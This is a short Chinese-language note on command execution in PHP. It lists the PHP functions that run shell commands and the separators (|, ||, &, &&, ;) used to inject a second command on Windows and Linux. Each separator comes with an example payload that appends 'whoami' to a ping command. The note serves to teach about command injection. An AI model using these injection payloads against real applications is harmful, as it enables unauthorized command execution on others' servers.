php环境下的命令执行

php环境下用于命令执行的函数有

system

exec

passthru

shell_exec

常见的绕过方法

windows下

|直接执行后面的语句 ping 127.0.0.1|whoami

||前面出错执行后面的，前面为假 ping2|whoami

&前面为假直接执行后面的，前面可真可假 ping 127.0.0.1&whoami

&&前面的语句为假直接出错，后面也不执行，前面只能为真 ping 127.0.0.1&&whoami

 

 

linux下

;前面执行完后执行后面的 ping 127.0.0.1;whoami

|管道符 显示后面的执行结果 ping 127.0.0.1|whoami

||当前面执行出错时执行后面的 ping 1||whoami

&前面语句为假则执行后面的，前面可真可假 ping 127.0.0.1&whoami

&&前面语句为假则直接出错 后面也不执行，后面只能为真 ping 127.0.0.1&&whoami